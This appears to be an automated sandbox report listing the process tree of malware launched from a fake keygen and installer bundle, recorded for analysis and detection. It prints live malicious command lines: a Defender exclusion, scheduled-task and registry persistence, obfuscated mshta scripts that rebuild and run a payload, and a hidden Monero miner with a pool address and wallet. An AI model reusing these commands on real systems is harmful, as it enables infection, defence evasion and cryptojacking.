nR0eXBlPSIzIiBldmVudHJlc3VsdD0iOSIgZXJyb3Jjb2RlPSItMTYwNjIxOTc0OCIgZXh0cmFjb2RlMT0iMCIvPjwvYXBwPjwvcmVxdWVzdD42⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp2_Active.Iso.Burner.2.5.0.serial.maker.zip\Active.Iso.Burner.2.5.0.serial.maker.exe"C:\Users\Admin\AppData\Local\Temp\Temp2_Active.Iso.Burner.2.5.0.serial.maker.zip\Active.Iso.Burner.2.5.0.serial.maker.exe"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "keygen-step-1.exe"4⤵
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 35⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\KiffAppE2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\KiffAppE2.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\PlsWnEU2.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\PlsWnEU2.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\PlsWnEU2.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\PlsWnEU2.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exekeygen-step-6.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Temp1_61571d37669a261_setup.zip\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_61571d37669a261_setup.zip\setup_x86_x64_install.exe"1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS4609A268\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4609A268\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri14587218a3fdd41.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri14587218a3fdd41.exeFri14587218a3fdd41.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5322977.scr"C:\Users\Admin\AppData\Roaming\5322977.scr" /S8⤵
-
C:\Users\Admin\AppData\Roaming\3962436.scr"C:\Users\Admin\AppData\Roaming\3962436.scr" /S8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\2435700.scr"C:\Users\Admin\AppData\Roaming\2435700.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5228146.scr"C:\Users\Admin\AppData\Roaming\5228146.scr" /S8⤵
-
C:\Users\Admin\AppData\Roaming\3666041.scr"C:\Users\Admin\AppData\Roaming\3666041.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\inst001.exe"C:\Users\Admin\AppData\Local\Temp\inst001.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Firstoffer.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Firstoffer.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 3368⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 4848⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 4968⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 4648⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 5088⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 7408⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"installer.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-E5777.tmp\installer.tmp"C:\Users\Admin\AppData\Local\Temp\is-E5777.tmp\installer.tmp" /SL5="$2042E,1158062,843264,C:\Users\Admin\AppData\Local\Temp\installer.exe"9⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 8368⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 8568⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 7888⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 8288⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 8808⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 8928⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 9168⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 10928⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 10608⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 10408⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 11168⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=C:\Users\Admin\AppData\Roaming\System\s1yqbq5z.p2p9⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xe8,0xec,0xf0,0xc4,0xf4,0x7fff9dd54f50,0x7fff9dd54f60,0x7fff9dd54f7010⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1428,1506780366427361299,2858630109897632824,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1668 /prefetch:810⤵
-
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "sfx_123_206.exe"10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"13⤵
-
C:\Windows\SysWOW64\control.execontrol ..\kZ_AmsXL.6G13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G14⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G15⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G16⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-GKUKE.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-GKUKE.tmp\setup_2.tmp" /SL5="$104AC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-SPUG4.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-SPUG4.tmp\setup_2.tmp" /SL5="$204AC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-8DIJ9.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-8DIJ9.tmp\postback.exe" ss111⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe"C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri140d16d9a199.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri140d16d9a199.exeFri140d16d9a199.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri146662f370123e.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri146662f370123e.exeFri146662f370123e.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri146662f370123e.exeC:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri146662f370123e.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri142dfd92e4.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri142dfd92e4.exeFri142dfd92e4.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri14201b9cd1.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri14201b9cd1.exeFri14201b9cd1.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Fri14201b9cd1.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri14201b9cd1.exe" & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Fri14201b9cd1.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri14be73761748f9bd.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri14be73761748f9bd.exeFri14be73761748f9bd.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\6054293.scr"C:\Users\Admin\AppData\Roaming\6054293.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5443599.scr"C:\Users\Admin\AppData\Roaming\5443599.scr" /S6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6673940.scr"C:\Users\Admin\AppData\Roaming\6673940.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\6761514.scr"C:\Users\Admin\AppData\Roaming\6761514.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\6595945.scr"C:\Users\Admin\AppData\Roaming\6595945.scr" /S6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri14324d712c5d54d4.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri14324d712c5d54d4.exeFri14324d712c5d54d4.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1427fb5c3d61d6.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri1427fb5c3d61d6.exeFri1427fb5c3d61d6.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri1427fb5c3d61d6.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri1427fb5c3d61d6.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri1427fb5c3d61d6.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri1427fb5c3d61d6.exe" ) do taskkill -F -Im "%~nXU"7⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"11⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM12⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "Fri1427fb5c3d61d6.exe"8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1425d076308.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri1425d076308.exeFri1425d076308.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Documents\QlRuwcpxXQbDBD4aux1jd1L4.exe"C:\Users\Admin\Documents\QlRuwcpxXQbDBD4aux1jd1L4.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\8⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\9⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\XMxcZciAXUPN2RfsBdZpysSq.exe"C:\Users\Admin\Documents\XMxcZciAXUPN2RfsBdZpysSq.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\XMxcZciAXUPN2RfsBdZpysSq.exeC:\Users\Admin\Documents\XMxcZciAXUPN2RfsBdZpysSq.exe7⤵
-
C:\Users\Admin\Documents\XMxcZciAXUPN2RfsBdZpysSq.exeC:\Users\Admin\Documents\XMxcZciAXUPN2RfsBdZpysSq.exe7⤵
-
C:\Users\Admin\Documents\04kdE0f11XedEMLPCjsT9oAB.exe"C:\Users\Admin\Documents\04kdE0f11XedEMLPCjsT9oAB.exe"6⤵
-
